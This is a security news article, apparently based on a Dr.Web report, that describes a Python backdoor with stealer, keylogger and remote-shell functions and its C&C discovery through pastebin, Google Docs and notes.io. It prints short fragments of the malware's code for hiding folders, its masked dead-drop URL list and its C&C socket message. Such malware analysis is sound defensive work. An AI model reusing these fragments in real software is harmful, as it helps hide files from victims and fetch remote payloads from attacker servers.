New Python Backdoor Allows Hackers to Control Your Infected Device Remotely

A Newly discovered backdoor that was written in Python has been detected as Python.BackDoor.33 with 3  interesting futures (stealer, keylogger, backdoor) that allow hackers to take full control of your infected device.

Recent threats are mainly had backdoor capabilities and that have many advance futures such as Keylogger, screen capture, webcam, Voice Recorder, File Browser, Remote  Command  Shell and install/uninstall Future.

Malware authors used Some advanced techniques to pack this Trojan to evade the Anti Virus detection.

It contains some packed malicious utility file that helps to run python scripts on windows ordinary executable Files. The functions of this malicious program are implemented in a file mscore.pyc.

Also Read : SYSCON Backdoor Uses FTP as a Command & Control Server

How Does This Python Backdoor Works

Once This Backdoor has infected the victim’s Device It saves a copy of the file on a Drive and modifies the Windows Registry key to confirm that, it has successfully launched and shut down the Script.

This Backdoor’s Main Malicious function will execute only after restarting the computer. Once system successfully restarted then this Trojan will Infect all the drives from C to Z.

Later It creates a hidden folder to copy it’s executable and a link to root directory that refers to malicious executable file and All files different from .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.

hidden_folder = os.path.join(drive, unichr(160))
if not os.path.exists(hidden_folder):
    os.mkdir(hidden_folder)
ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)

Trojan try to identify the IP address an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.

url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]

According to Dr.Web Reseracher, If the backdoor was successful in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response , it will download the Python scripts added to the Dr.Web virus databases as Python.BackDoor.35 from the C&C server and run them on the infected device .

GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'

Malicious python scripts implement with 3 main Futures that is stealer, keylogger, backdoor and this Trojan will Perform following activities after infecting the victim’s machine.

• Steal information from such browsers as Chrome, Opera, Yandex, Amigo, Torch, and Spark;
• Perform the keylogger functions and make screenshots;
• Download additional modules are written in Python and execute them;
• Download files and save then on a media of the infected device;
• Obtain contents of the specified folder;
• “Travel” across folders;
• Request system information.

SHA1:

• 05cae95a3340395e363c2d6bddbc57833dbdb85c